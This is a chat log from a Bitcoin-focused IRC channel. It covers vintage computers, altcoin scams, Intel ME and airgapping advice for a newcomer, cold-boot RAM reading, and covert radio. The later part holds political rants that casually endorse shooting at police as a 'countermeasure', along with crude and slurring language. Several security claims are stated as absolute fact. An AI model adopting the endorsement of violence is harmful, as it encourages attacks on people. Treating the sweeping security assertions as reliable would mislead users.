1732560;1509726092;asciilifeform;in other pete_dushenski , asciilifeform issued pet a circa-2000 crappletop with os9 and no nic, she luvvs it 1732561;1509726146;asciilifeform;pete_dushenski ( ben_vulpes ? other old-time crapplists ? ) ever saw open the battery on these ? what kind of cells ? 1732562;1509726207;asciilifeform;or hm nm found http://fweb.wallawalla.edu/~frohro/Powerbook/Pismo/Battery etc. 1732563;1509726631;asciilifeform;ben_vulpes: wouldja believe, i got stopped at the border for extra helping of inspector fidgeting. guess why. 1732564;1509726689;asciilifeform;( spoiler : cans of sprats. but no one confiscated them, or even opened suitcase, but the ritual of putting'em through larger xray magicbox was carried out and the voodoo gods -- satisfied ) 1732565;1509726781;pete_dushenski;ben_vulpes: generous ? i'm hacking in cascadia! 1732566;1509726789;pete_dushenski;mod6: howdy :) 1732567;1509726834;mod6;how goes? 1732568;1509726843;pete_dushenski;asciilifeform: always lusted after those as a youf but never had much chance to fiddle with 'em. unobtanium for young pete's budget but glad to hear they're still running strong 1732569;1509726862;pete_dushenski;mod6: never better. you ? 1732570;1509726882;asciilifeform;pete_dushenski: i lusted and was finally cured when found one at scrap dealer 1732571;1509726896;asciilifeform;tried 6 diff pata ssd in it, 0 recognized 1732572;1509726899;mod6;doin well, thx! 1732573;1509726959;shinohai;oh hai mod6 .... happy Friday! =^.^= 1732574;1509727109;pete_dushenski;asciilifeform: "never meet your heroes" (tm) 1732575;1509727130;pete_dushenski;mod6: awesome :) 1732576;1509727195;mod6;happy friday :] 1732577;1509727236;asciilifeform;pete_dushenski: dunno, you seem pretty satisfied with that mechanical clock 1732578;1509727250;asciilifeform;even tho dollarstore crystal keeps better time 1732579;1509727358;pete_dushenski;heh boys and their toys y'know 1732580;1509727379;pete_dushenski;who needs tramborghini when corolla exists ? 1732581;1509727419;pete_dushenski;leave 'need' to the marxists 1732582;1509727450;*;pete_dushenski to more meatings, cheers! 1732583;1509727548;asciilifeform;the dark seekrit is that the old rusty dacia in empty street of timis, goes faster than mazerati on washington 'beltway'. 1732584;1509727585;mod6;funny how that works huh 1732585;1509727589;asciilifeform;and its owner -- eats better, sleeps moar sweetly, fucks thrustier. 1732586;1509727600;mod6;haha 1732587;1509727748;asciilifeform;dacia prolly lasts longer, and moar repairable : i saw more than one example from clearly pre-ceaușescu times 1732588;1509727755;mircea_popescu;http://btcbase.org/log/2017-11-03#1732519 << over 0.04 ?! 1732589;1509727755;a111;Logged on 2017-11-03 15:11 asciilifeform: in other lollamatics, https://bitbet.us/bet/1399/bitcoin-to-top-6000-usd-in-2017/#c7559 ( blocks archiverbot , http://wotpaste.cascadianhacker.com/pastes/FTOCH/?raw=true ) >> znort finally ran-with-the-moneyz 1732590;1509727759;asciilifeform;well pre-fall-of-ceaușescu at any rate 1732591;1509727783;asciilifeform;mircea_popescu: i have nfi over what, iirc there were a few hundy btc in limbo 1732592;1509727786;mircea_popescu;ah misread, it was 1.71 to 1.56 1732593;1509727972;mircea_popescu;http://btcbase.org/log/2017-11-03#1732526 << word. 1732594;1509727972;a111;Logged on 2017-11-03 15:32 asciilifeform: btw : truly, genuinely spiffy pc mobos ( e.g. pcengines 'APU' series ) have ~on-board ttl serial port pins~ 1732595;1509728041;mircea_popescu;http://btcbase.org/log/2017-11-03#1732541 << or could simply use fg as is, neh 1732596;1509728041;a111;Logged on 2017-11-03 15:40 asciilifeform: btw if anyone REALLY needs a 9200 baud ( or other ) baud rate, i ( or for that matter anyone ) can build a replacement cpld firmware image that makes this happen 1732597;1509728068;asciilifeform;mircea_popescu: was thinking in case someone wants to literally connect to pdp8 or other item that capped out under 115200 1732598;1509728068;mircea_popescu;http://btcbase.org/log/2017-11-03#1732547 << the cobra was relatively advanced/later. 1732599;1509728068;a111;Logged on 2017-11-03 15:53 asciilifeform: http://www.homecomputer.de/pages/easteurope_ro.html#cobra << hilariously and unsurprisingly, ro z80 clone had better keyboard than today's 3000+ $ crapbooks etc 1732600;1509728088;mircea_popescu;i had to have custom fucking made kbd replacement put into teh old style timisoara-made z80 clones 1732601;1509728096;asciilifeform;( asciilifeform for instance had a 486 in 1990s that couldn't speak 115200 ) 1732602;1509728113;asciilifeform;mircea_popescu: what did they come with , bk0010-style 'chiclet' ? 1732603;1509728132;mircea_popescu;basically these thin plastic pill style things lemme see if i can find one 1732604;1509728191;mircea_popescu;https://images.okr.ro/serve/auctions.v7/2016/feb/11/970c038b1e8d177b47bc965e30014936-0-235_235_11.jpg << original https://sites.google.com/site/georgechirtoaca/_/rsrc/1257401238894/timisoara_microtim_2-large.jpg << rekitted kbd 1732605;1509728203;mircea_popescu;eventually they ended up coming that way from the factory. orig kbd was utter shit. 1732606;1509728208;asciilifeform;aaaa yes chiclet 1732607;1509728210;mircea_popescu;including failure mode where it self-typed 1732608;1509728256;asciilifeform;wouldja believe at one time it was thought to be the worst physically possible kbd. but never underestimate crapple, pinoneer of drawing-only keyboard. 1732609;1509728270;mircea_popescu;hey, i'm satisfied ipad/tablets worst possible. 1732610;1509728276;mircea_popescu;but yes, at the time this was it. 1732611;1509728281;mircea_popescu;technology, ever progresses. 1732612;1509728330;asciilifeform;( for n00bz : 1980s micros, esp in orcistans, tended to have kbd resembling that of cheap chinese air conditioner remote today ) 1732613;1509728362;mircea_popescu;diana_coman iirc the cobra had 80kb ? 1732614;1509728372;asciilifeform;80 is princely 1732615;1509728375;mircea_popescu;ikr? 1732616;1509728379;asciilifeform;sure it wasn't 8 ? 1732617;1509728382;mircea_popescu;my originals had 48 1732618;1509728390;mircea_popescu;no im telling you, this was later/advanced model 1732619;1509728398;mircea_popescu;made at brasov. 1732620;1509728428;asciilifeform;neato. 1732621;1509728444;mircea_popescu;went into production 1988, then 1989 it was all over. 1732622;1509728472;mircea_popescu;imported chipsets iirc too. 1732623;1509728485;asciilifeform;from where ? ddr ? 1732624;1509728490;mircea_popescu;and a very short run, iirc documentedly only ~1k produced. 1732625;1509728494;mircea_popescu;so a primo collector item. 1732626;1509728531;mircea_popescu;asciilifeform well, "iprs" was the comp dealing. mostly german / swiss contacts yeah. 1732627;1509728554;asciilifeform;i'm not aware of a swiss-made z80 set having existed 1732628;1509728556;asciilifeform;but hellknows. 1732629;1509728563;asciilifeform;ddr defo existed. i have one here. 1732630;1509728567;mircea_popescu;asciilifeform "swiss" in this context means refloated via switzerland 1732631;1509728595;asciilifeform;mircea_popescu: do you remember the colour ? ( black plastic ? or ceramic white and gold cap ? ) 1732632;1509728603;asciilifeform;of the chipz that is 1732633;1509728609;mircea_popescu;the mold was made in ro oh. 1732634;1509728635;mircea_popescu;i don't even know i ever had one. by the time they were more or less available i got ibm pc 1732635;1509728705;mircea_popescu;but iirc it had a full cp/m os to o 1732636;1509728730;asciilifeform;hm i distinctly recall a thread where mircea_popescu and z80 1732637;1509728736;asciilifeform;tapes broadcast on tv etc 1732638;1509728753;mircea_popescu;definitely. i still have the old tim-s'n 1732639;1509728757;mircea_popescu;somewhere 1732640;1509729089;mircea_popescu;(notably, item got broken into while on display in cccp in 88, stolen mobo) 1732641;1509730047;mircea_popescu;http://btcbase.org/log/2017-11-03#1732558 << afaik there were no outstanding claims after either of these 1732642;1509730047;a111;Logged on 2017-11-03 16:19 asciilifeform: pete_dushenski: i then stand corrected : ran once, and then came back twice to fleece the incorrigible idjits 1732643;1509730057;*;mircea_popescu hasn't been following the story. 1732644;1509730129;mircea_popescu;http://btcbase.org/log/2017-11-03#1732564 << they've gotten very "thou shalt not open bags, the might of inca rests in remoteness". 1732645;1509730129;a111;Logged on 2017-11-03 16:31 asciilifeform: ( spoiler : cans of sprats. but no one confiscated them, or even opened suitcase, but the ritual of putting'em through larger xray magicbox was carried out and the voodoo gods -- satisfied ) 1732646;1509730226;mircea_popescu;http://btcbase.org/log/2017-11-03#1732583 << to think timis street empty one must come from not such a good life. 1732647;1509730226;a111;Logged on 2017-11-03 16:45 asciilifeform: the dark seekrit is that the old rusty dacia in empty street of timis, goes faster than mazerati on washington 'beltway'. 1732648;1509731744;asciilifeform;timis cars... move!! 1732649;1509732968;asciilifeform;meanwhile, in elaborate altcoin scamola world, https://chia.network 1732650;1509733005;asciilifeform;'Bram Cohen, famously invented BitTorrent' 'proofs of space and time' [many squigglies] 'decentralized, and more secure' 'Install and setup Keybase' etc. 1732651;1509733036;asciilifeform;and naturally, 'Chia Network is a San Francisco-based company' 'Chia will be sold to the public next year'. 1732652;1509733301;ben_vulpes;"eyyy, unsuspecting public, i hear ya like holding bags" 1732653;1509733339;asciilifeform;i still even recall the days when shitcoin artists tried to mask their premining or at least distract from it somehow 1732654;1509733363;asciilifeform;but somehow became 'normal' behaviour in the rat pit, unremarkable nao. 1732655;1509733371;ben_vulpes;which is all regulation buys one: houses built to the minimum standard, and retirees so accustomed to government insulation from possible bad decisions that the entire stockholding class has nfi that paper could be worthless 1732656;1509733523;asciilifeform;gotta wonder, how come none of the audience have the half cup of oil in their braincase to answer the 'here is some lolcatcoin, gimme btc in exchange' with 'if it's so great, why dontcha keep it, and why would you trade it for boring old btc' 1732657;1509733573;ben_vulpes;well there's a whitepaper, that makes it just as good as bitcoin. 1732658;1509733609;ben_vulpes;the corn syrup says maple syrup, that means it's just as good and certainly cheaper at any rate 1732659;1509733729;asciilifeform;gotta luvv the 'i have a tall pile of mathemasturbatory squigglies ergo I Fix Bitcoin' school of derpery 1732660;1509733747;asciilifeform;yesterday i learned that there exists a similar subculture in academia as pertains to 'covert radio' ( see 'olivia' thread ) 1732661;1509733779;asciilifeform;massive piles of loose-hanging theoretical 'sub noise floor max possible bit rate' etc 1732662;1509733783;asciilifeform;0 actionables. 1732663;1509735551;asciilifeform;!!up vlad56324 1732664;1509735552;deedbot;vlad56324 voiced for 30 minutes. 1732665;1509735556;vlad56324;hello 1732666;1509735566;asciilifeform;vlad56324: who might you be ? 1732667;1509735586;vlad56324;newbie, learning a lot from btcbase logs 1732668;1509735604;asciilifeform;vlad56324: consider making a key and regging in wot ? 1732669;1509735606;asciilifeform;!!help 1732670;1509735606;deedbot;http://deedbot.org/help.html 1732671;1509735628;vlad56324;yes going to do 1732672;1509735698;asciilifeform;vlad56324: say a bit about yerself while you have the microphone ? 1732673;1509735873;vlad56324;i knew bitcoin on 2015, trilema blog in the past week, aside from that i'm just an average joe 1732674;1509735923;vlad56324;irl i work at a bakery 1732675;1509735952;vlad56324;english is not my main language 1732676;1509736097;asciilifeform;lol mine neither 1732677;1509736107;asciilifeform;where do you come from, vlad56324 ? 1732678;1509736118;vlad56324;it 1732679;1509736122;vlad56324;italy 1732680;1509736230;asciilifeform;mircea_popescu has a pretty solid command of it lang; if you ask him very politely he might answer something. 1732681;1509736243;vlad56324;what i would like to ask after reading the logs: what is a safe linux distro to use for day to day computing? 1732682;1509736261;asciilifeform;i'll answer this one : there isn't one. 1732683;1509736277;vlad56324;basically i'm on ubuntu since a lot of time, then after reading i've discovered some useful networking instruments such as tcptrack 1732684;1509736292;vlad56324;and saw the hell going in and out my pc w/o reason 1732685;1509736331;*;asciilifeform reads 'tcptrack' manual and bewildered, why is it needed ? what's wrong with ' netstat -a ' ? 1732686;1509736398;vlad56324;i would like to ask: there is some specific distro that by default doesn't need to communicate out of my lan? 1732687;1509736411;asciilifeform;all of them, if you take out the nic from your box, lol 1732688;1509736442;asciilifeform;but no there is not a sane distro by any sort of reasonable standard 1732689;1509736472;asciilifeform;a few of the folx here use heavily modified gentoo-derived items 1732690;1509736493;asciilifeform;but none of it is a thing that you can 'download, install, forget' etc without working with own hands 1732691;1509736535;asciilifeform;http://danielpbarron.com/2017/gentoo-eulora-quest << danielpbarron's gentoo recipe 1732692;1509736541;vlad56324;i mean, i like and think that there is no harm about having some ARP request and dhcp stuff, but then, i realized that even if i was with closed browser, doing text editing, there was traffic going outside my lan 1732693;1509736625;vlad56324;this is meant to be secure? 1732694;1509736631;asciilifeform;take, e.g., the above recipe, and build a box where the only soft is what you put there deliberately, with own hands. 1732695;1509736639;asciilifeform;it isn't a cure but is a treatment. 1732696;1509736655;vlad56324;ah ok, like linux from scratch 1732697;1509736671;asciilifeform;and throw out the kde's, gnomes, similar garbage. 1732698;1509736719;asciilifeform;at the end of the day you should have a box where the question 'why is this on my machine' should never have to be asked 1732699;1509736735;vlad56324;nice 1732700;1509736764;asciilifeform;it will still be possible to be surprised at 'why is this thing, that i put there, doing $x' . but this is a substantial step above the pig farm where you have a bowl of unattributable slop. 1732701;1509736771;vlad56324;then i saw some folks that prefer freebsd "for security" but never understood the reasons behind this 1732702;1509736789;asciilifeform;vlad56324: nostalgia. 10yrs ago or so it was still appealing ( smaller, simpler, less rotten . ) 1732703;1509736792;vlad56324;may i ask if there is some particular real advantage with freebsd? 1732704;1509736803;asciilifeform;see above. 1732705;1509736807;asciilifeform;at one time it was small. 1732706;1509736819;asciilifeform;!#s fits in head 1732707;1509736819;a111;132 results for "fits in head", http://btcbase.org/log-search?q=fits%20in%20head 1732708;1509736822;asciilifeform;^ see logs. 1732709;1509736827;vlad56324;thanks 1732710;1509736925;asciilifeform;vlad56324: asking today for 'which distro most secure' is rather like asking re which apartment block in chernobyl zone is most habitable 1732711;1509736967;vlad56324;you know what: it seems to me that with 56k it was very easy to have some decent "fine grained" control over the packets 1732712;1509736968;asciilifeform;i.e. the question has an answer, but the phrasing of the question makes the answer inevitably misleading . 1732713;1509737000;vlad56324;now with broadband it seems that everyone has the permission to grant the shit out of my pc in terms of TCP connections 1732714;1509737039;vlad56324;and this scares me thinking about of real security 1732715;1509737082;asciilifeform;consider that in the age of 1990s microshit, it was not necessary for a box to have modem at all, to be infected ( just as today ) 1732716;1509737114;vlad56324;ok and another thing that was really a curiosity after reading the logs 1732717;1509737114;asciilifeform;the fault, to borrow from shakespeare, 'is not in our packets but in ourselves' 1732718;1509737121;vlad56324;intel ME 1732719;1509737146;vlad56324;basically i understood that there is this... kinda backdoor 1732720;1509737158;asciilifeform;don't buy intel. or amd made in 2011 and after. 1732721;1509737208;vlad56324;but if i generate entropy with my paper + pen, am i on the safe side or still intel can theoretically fuck me? 1732722;1509737221;vlad56324;(paper + pen then input on PC) 1732723;1509737265;asciilifeform;vlad56324: if nic is plugged in, enemy has remote control over whole box at all times. ( if not plugged in -- collects, e.g., keystrokes, and disgorges on demand later. ) 1732724;1509737327;vlad56324;that's creepy as fuck. Consider that a couple of years ago i was feeling safe generating paper wallets on a online ubuntu distro 1732725;1509737351;asciilifeform;( 'remote control' in the physical sense, greater than your own, he can read 'unused' pages of ram from last warm boot, rewrite arbitrary sectors on hdd, etc ) 1732726;1509737362;asciilifeform;!!up vlad56324 1732727;1509737363;deedbot;vlad56324 voiced for 30 minutes. 1732728;1509737466;vlad56324;so true cold storage should be on a dedicated computer, correct? 1732729;1509737484;asciilifeform;http://btcbase.org/log/2017-05-02#1650832 << see also, re intel et al 1732730;1509737484;a111;Logged on 2017-05-02 12:22 asciilifeform: Framedragger: if you think they use distinguishable magic packets, think again 1732731;1509737501;vlad56324;not one that you boot with a live cd w/o internet 1732732;1509737502;asciilifeform;vlad56324: see mircea_popescu's essay re 'airgap' . 1732733;1509737517;asciilifeform;http://trilema.com/2013/how-to-airgap-a-practical-guide/ . 1732734;1509737697;asciilifeform;vlad56324: also 'cold' normally implies the use of non-electrical item ( e.g. paper ) 1732735;1509737711;asciilifeform;once you load it into a comp, it is 'hot' again. 1732736;1509738266;vlad56324;You want all new hardware, don't reuse stuff that was already online 1732737;1509738283;vlad56324;i really not have understood this part 1732738;1509738386;vlad56324;and not understood full disk encryption flaws 1732739;1509739628;diana_coman;mircea_popescu> diana_coman iirc the cobra had 80kb ? <- hmmm, iirc 58 keys but I can't say I'm 100% certain 1732740;1509740293;asciilifeform;diana_coman: i think he meant kB 1732741;1509740305;asciilifeform;as in, addr space 1732742;1509740372;diana_coman;oh, oh; as far as I know there were 2 versions at least and one of them with 80kB, yes 1732743;1509740376;asciilifeform;neato. 1732744;1509740873;BingoBoingo; what i would like to ask after reading the logs: what is a safe linux distro to use for day to day computing? << Minix 2 is prolly closest 1732745;1509741498;trinque;good enough for intel's ME 1732746;1509741524;asciilifeform;it dun particularly matter what yer running if the enemy lives on the bus, no. 1732747;1509741631;trinque;http://blog.ptsecurity.com/2017/04/intel-me-way-of-static-analysis.html << "It would seem that ME 11 is based on the MINIX 3 OS" 1732748;1509741652;asciilifeform;lol! 1732749;1509741872;asciilifeform;gotta luvv, incidentally, the 'huffman compression' thing. 'we can't decompress because nobody has the table'. except if you had instrumented sticks of ram, that can be read out of band ( i.e. without cooperation of the mobo and its contents , through a second hole ) you could quite easily restore the entire image ( which sections get read , in what order ? concatenate'em. ) 1732750;1509741889;asciilifeform;and at same time 'but the RAM region used by ME is not accessible from the OS' goes away. 1732751;1509741921;asciilifeform;'analogue hole' motherfuckers. 1732752;1509741948;asciilifeform;if nobody's raped'em through it, it is because evidently nobody can be arsed. 1732753;1509743227;BingoBoingo;http://btcbase.org/log/2017-11-03#1732747 << If you have a Minix3 that is too much Minix, that's almost a whole Fedora of Linux 1732754;1509743227;a111;Logged on 2017-11-03 20:40 trinque: http://blog.ptsecurity.com/2017/04/intel-me-way-of-static-analysis.html << "It would seem that ME 11 is based on the MINIX 3 OS" 1732755;1509746029;mircea_popescu;and in other tears of modernity, "I was formerly a PhD student at Max Planck Institute for Intelligent Systems, Tübingen, Germany, under the supervision of Bernhard Schölkopf and Stefan Harmeling, where my research focus was image denoising. I have achieved state-of-the-art results using neural networks. I am currently co-founder at TasteHit, a web analytics and personalization startup. We aim to create a unique browsing ex 1732756;1509746029;mircea_popescu;perience tailored to a visitor's taste, using machine learning." 1732757;1509746135;mircea_popescu;http://btcbase.org/log/2017-11-03#1732652 << consider also >> http://btcbase.org/log/2017-10-26#1729340 1732758;1509746135;a111;Logged on 2017-11-03 18:21 ben_vulpes: "eyyy, unsuspecting public, i hear ya like holding bags" 1732759;1509746135;a111;Logged on 2017-10-26 17:11 mircea_popescu: anyway, there's still an open thread god damned it. so re "in the hope they'll achieve usg agency status" above : the final socialism, usg's "ourdemocracy" came up with a gamified nationalization process : they naturally confiscate the domain leaders in all domains, under the guise of you know, "pension fund investments" and "consumer protection law enforcement". ie, there's a faux money and a faux legal prong which make sure 1732760;1509746162;mircea_popescu;not liek the public's doing much investment these days. approx on par with good soviet of 1987, had special retainer out of salary for "investments". 1732761;1509746304;mircea_popescu;http://btcbase.org/log/2017-11-03#1732656 << you should read the "seo expertise/information products" stuff sometime. 1732762;1509746304;a111;Logged on 2017-11-03 18:25 asciilifeform: gotta wonder, how come none of the audience have the half cup of oil in their braincase to answer the 'here is some lolcatcoin, gimme btc in exchange' with 'if it's so great, why dontcha keep it, and why would you trade it for boring old btc' 1732763;1509746346;mircea_popescu;template pretty much is "pay me clerical fee for the styory of method to make $random-figure". whole fucking thing is based on wsd ; which is the problem with tards, fail to distinguish the stories they tell themselves from reality anymore. 1732764;1509746348;mircea_popescu;"i want to believe!" 1732765;1509746411;mircea_popescu;http://btcbase.org/log/2017-11-03#1732674 << hey, bakery better than the crapple store. 1732766;1509746411;a111;Logged on 2017-11-03 19:05 vlad56324: irl i work at a bakery 1732767;1509746454;trinque;guy who can announce what he does without pissing himself also a plus 1732768;1509746658;BingoBoingo;!~ticker --market all 1732769;1509746663;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7180.01, vol: 16280.20064890 | Bitfinex BTCUSD last: 7247.2, vol: 63495.49522234 | Kraken BTCUSD last: 7099.0, vol: 5008.96541161 | Volume-weighted last average: 7225.54283551 1732770;1509746671;BingoBoingo;Still Crashing 1732771;1509746960;mircea_popescu;word. 1732772;1509747004;mircea_popescu;http://btcbase.org/log/2017-11-03#1732685 << same reason people use perl instead of hacking sed awk and grep together every time. 1732773;1509747004;a111;Logged on 2017-11-03 19:12 asciilifeform reads 'tcptrack' manual and bewildered, why is it needed ? what's wrong with ' netstat -a ' ? 1732774;1509747070;mircea_popescu;http://btcbase.org/log/2017-11-03#1732693 << the danielpbarron eulora thing is intended as work-in-progress os basis for eulora (the mmorpg). it is not specifically secure yet ; it is however cleanner, in that less spurious / unnecessary / unknown or incomprejhensioble stuff included. 1732775;1509747070;a111;Logged on 2017-11-03 19:17 vlad56324: this is meant to be secure? 1732776;1509747195;mircea_popescu;http://btcbase.org/log/2017-11-03#1732711 << of course. back in the z80 days the whole memory could be printed out, wouldn't even take a whole book. more like what today passes for one, ie 40-50 pages' worth. 1732777;1509747195;a111;Logged on 2017-11-03 19:22 vlad56324: you know what: it seems to me that with 56k it was very easy to have some decent "fine grained" control over the packets 1732778;1509747207;mircea_popescu;people could and routinely did read the whole memory content. 1732779;1509747256;mircea_popescu;http://btcbase.org/log/2017-11-03#1732721 << can fuck, can fuck. 1732780;1509747256;a111;Logged on 2017-11-03 19:26 vlad56324: but if i generate entropy with my paper + pen, am i on the safe side or still intel can theoretically fuck me? 1732781;1509747347;BingoBoingo;Grain fineness is one of those things that scales. If you want good rice start with a few tons rather than pounds. 1732782;1509747355;mircea_popescu;http://btcbase.org/log/2017-11-03#1732737 << do you understand how the original stuxnet item propagated ? 1732783;1509747355;a111;Logged on 2017-11-03 19:44 vlad56324: i really not have understood this part 1732784;1509747386;mircea_popescu;ah he's not here anymoar. 1732785;1509747469;mircea_popescu;http://btcbase.org/log/2017-11-03#1732752 << such ram is found in every "cyber forensics" lab. 1732786;1509747469;a111;Logged on 2017-11-03 20:45 asciilifeform: if nobody's raped'em through it, it is because evidently nobody can be arsed. 1732787;1509747624;mircea_popescu;in other lulz of all time : the pre-collapse of pantsuitistan scholarship of the anglo "peasan't revolt" (item where they beheaded the lord chancellor/treasurer/all cambridge robes they could find etc) was that MAJOR SOCIO-ECONOMICAL and POLITICAL!!! development OF GREAT IMPACT!!11 1732788;1509747637;mircea_popescu;however, post-collapse, the scholarship on the same topic is "probably unimportant nonevent". 1732789;1509747692;BingoBoingo;!~later tell danielpbarron http://wotpaste.cascadianhacker.com/pastes/sHhm 1732790;1509747692;jhvh1;BingoBoingo: The operation succeeded. 1732791;1509747698;mircea_popescu;isn't it great for a free and open society to enjoy a vigurous academia which, like the brain on the healthy body, encased in its grey old stones, can lead through the bog of nonsense towards that enchanted high plateau of truth and sparkling clean springwater on the side ? 1732792;1509748895;*;BingoBoingo read that as bong water 1732793;1509748914;mircea_popescu;heh 1732794;1509748958;BingoBoingo;Just fit the academia theme 1732795;1509750389;shinohai;Trying to celebrate someone's birthday over skype really sux 1732796;1509750417;shinohai;Though taking a drink every time the video buffers is fun. Wheeeeee! 1732797;1509750455;davout;drunk IRC is best IRC 1732798;1509750515;shinohai;ikr? 1732799;1509750804;mircea_popescu;meanwhile on the shared pickle front, http://78.media.tumblr.com/0a8cb4685b6e25335b0dfc587e0ee847/tumblr_ncfkylCPhs1rlva65o1_400.gif 1732800;1509750939;shinohai;"It's kosher!" 1732801;1509751091;mircea_popescu;nothing could be kosherer than cocksharing. 1732802;1509755771;asciilifeform;http://btcbase.org/log/2017-11-03#1732785 << on the contrary, it is not publicly available for any kind of money ( and would need some gnarly custom silicon, to produce ) 1732803;1509755771;a111;Logged on 2017-11-03 22:17 mircea_popescu: http://btcbase.org/log/2017-11-03#1732752 << such ram is found in every "cyber forensics" lab. 1732804;1509755797;mircea_popescu;yes well 1732805;1509755798;asciilifeform;if mircea_popescu or anyone else knows of anything resembling this item off-the-shelf -- plox to link. 1732806;1509755826;mircea_popescu;"cyber forensic lab" aka the usg owned-and-operator "truefax" producer for usg court system. 1732807;1509755834;asciilifeform;there ~does~ exist that rig with the freon bottle 1732808;1509755837;asciilifeform;but is barbaric 1732809;1509755860;asciilifeform;( you freeze conventional ramstix and read out in specially built reader ) 1732810;1509755899;asciilifeform;about 10k usd, and you need 1 per stick type. 1732811;1509755946;asciilifeform;and some % of bits will flip 1732812;1509755985;asciilifeform;goodenuff for inquisitor, but painful for reversing. 1732813;1509757496;deedbot;http://trilema.com/2017/minigame-smg-october-2017-statement/ << Trilema - MiniGame (S.MG), October 2017 Statement 1732814;1509761451;lobbes;http://btcbase.org/log/2017-11-03#1732293 << I think I see what you mean. In my case the meaning would end up being "x are never routed through y, ever". I could then end up regretting this if I one day encounter the situation where changing that meaning would result in an overall better process, but, alas, I cannot change due to downstream dependence on that meaning 1732815;1509761451;a111;Logged on 2017-11-03 06:36 mircea_popescu: http://btcbase.org/log/2017-11-02#1732274 << not exactly. exception becomes semantically meaningful, then others end up building applications on the meaning, then you're stuck supporting unintended downstreams. 1732816;1509763036;mircea_popescu;right 1732817;1509768515;BingoBoingo;!~ticker --market all 1732818;1509768520;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7194.7, vol: 16097.63245157 | Bitfinex BTCUSD last: 7247.2, vol: 63495.49522234 | Kraken BTCUSD last: 7190.4, vol: 4824.08706804 | Volume-weighted last average: 7233.94282429 1732819;1509777799;deedbot;http://trilema.com/2017/the-cunt-off-brutti-sporchi-e-cattivi-vs-la-chiave-or-rome-and-venezia/ << Trilema - The Cunt-off : Brutti, sporchi e cattivi vs La chiave ; or Rome and Venezia 1732820;1509794975;apeloyee;http://btcbase.org/log/2017-11-02#1732128 << correlation between signals received on two stations can reveal the fact that somebody's transmitting 1732821;1509794975;a111;Logged on 2017-11-02 19:33 asciilifeform: ^ per asciilifeform's current understanding, thing is untriangulable unless enemy knows the freq keying pattern, or is standing in the near field of your transmitter. 1732822;1509803807;mircea_popescu;apeloyee correlation can reveal anything one wishes it to. 1732823;1509804692;mircea_popescu;in other lulz, "Die Geschichte von zwei Jungen auf trilema – ein Blog von mircea popescu. Bitcoin Bergbau auf Android" 1732824;1509804721;mircea_popescu;ie, there's a dork doing great seo successes by auto-translating and republishing content. 1732825;1509804743;mircea_popescu;"gotta try, man!" "it kinda might works, i think" etcetera. 1732826;1509805087;asciilifeform;apeloyee: q was, is it possible to transmit in such a way that for someone without the key, there ~is~ no 'signals received' 1732827;1509805173;mircea_popescu;asciilifeform "british researchers" as they're known in the romanian press will receive all sorts of signals, even when no signals there. 1732828;1509805181;asciilifeform;( 1 elementary approach : carrierless transmission . ) 1732829;1509805201;mircea_popescu;you've seen the whole "blockchain interpretation & crystal ball" "expert services" usg spawned to date neh ? 1732830;1509805205;asciilifeform;mircea_popescu: and tesla picked up 'martians' , lol. 1732831;1509805209;mircea_popescu;exactly so. 1732832;1509805238;asciilifeform;concern is, it is prohibitively expensive for gestapo to search 100,000 houses. but not 10. hence 'fox hunt'. 1732833;1509805243;mircea_popescu;they "decode" who paid whom when via blockchain signals, they see transmitters etc, they've "incontrovertible proof" that so and so parcel of fiatola broke the laws and so on 1732834;1509805257;asciilifeform;generally with old-fashioned tech, directionfinder works. 1732835;1509805272;asciilifeform;and when gestapo says 'transmitter here' and they break the door, it in fact is there. 1732836;1509805291;mircea_popescu;in an idealized model. 1732837;1509805320;mircea_popescu;consider the following point : the recent las vegas shooter had bought a room ; and had ferried a quarter ton of materiel up there ; and then the concert started, and he sat. 1732838;1509805323;mircea_popescu;he sat and meditated. 1732839;1509805330;*;shinohai is reminded of how the Syrians captured Eli Cohen in this thread ...... 1732840;1509805338;mircea_popescu;he thought to himself, is this me, is this my life ? am i not better than this perhaps ? maybe haymasfuturo ? 1732841;1509805361;mircea_popescu;ONLY when some dork tried breaking in the door, ONLY, ABSOLUTELY ONLY when confronted with a hard decision did he start shooting. not before. 1732842;1509805386;asciilifeform;the 'could fight to the death to defend the radio' proposition is orthogonal to the q of 'can haz pill against foxhunters' . 1732843;1509805394;mircea_popescu;in fact, it is altogether likely that HADN'T there been a "hero security guard"/illegal immigrant to try and break in the door, 60 or so useless tards watching a "concert" would still be here sucking down their coca colas. 1732844;1509805411;mircea_popescu;asciilifeform the broader point i am making is that the constraints on the gestapo are neither financial nor technological. 1732845;1509805491;mircea_popescu;so, to make it perfectly plain : A. they'll break down "your" door at any point and for no reason because it's not your fucking door and they're not reasonable. B. a forty cent bullet is more effectual countermeasure than ANY amount of thought. 1732846;1509805579;mircea_popescu;people get shot while the usg brown shirts are breaking in all the time ; they had no transmitters. adding one that had to this list does not raise above the statistical noise floor. 1732847;1509805627;asciilifeform;mircea_popescu must be one of the folx who brings own bomb on every plane, as in the famous anecdote, 'probability of 2 bombs is epsilon' 1732848;1509805694;mircea_popescu;i am offering the (sadly unverifiable) proposition here that it is more likely to have your door broken into and your pet shot because "they thought tuttle lived there" a la brasil ; than because you were running a clinton-porn-pirate-radiostation and someone in usg noticed. 1732849;1509805713;asciilifeform;even more likely to be run down by bus crossing the street 1732850;1509805726;mircea_popescu;possibly not. bus fatalties are few. 1732851;1509805732;asciilifeform;around here plenty 1732852;1509805738;asciilifeform;( though as often car as bus ) 1732853;1509805768;mircea_popescu;asciilifeform actuary table says ~300 dead / year 1732854;1509805819;asciilifeform;let's momentarily dispense with the broken doors and midnight policemen, and consider battlefield , where everybody's properly armed etc. for clarity of thought. conventional radio -- triangulable and draws accurate fire on its position. q is, can haz one that does not ? or not. 1732855;1509805832;mircea_popescu;meanwhile usg criminal gang aka "law enforcement" just killed its 999th victim this year, nov 2nd. 71 yo jerry roach. 1732856;1509805865;mircea_popescu;asciilifeform but that's the point, a battlefield where everyone was properly armed hasn't existed since the sabine "war-games" ie let's figure out who impregnates this gang of feverish sluts. 1732857;1509805894;mircea_popescu;http://killedbypolice.net/ for the curious, btw. 1732858;1509805919;asciilifeform;^ would be slightly moar interesting if had mug shots 1732859;1509805937;mircea_popescu;has news links. good like this, no pics. 1732860;1509805962;mircea_popescu;(mugshots linked from name on occasion) 1732861;1509805968;asciilifeform;http://www.tampabay.com/news/publicsafety/crime/Police-Lakeland-man-71-refused-orders-dies-after-police-confrontation_162282650 << fresh one 1732862;1509805978;mircea_popescu;"dies" "after confrontation". 1732863;1509805999;asciilifeform;some % are 'assisted suicides' 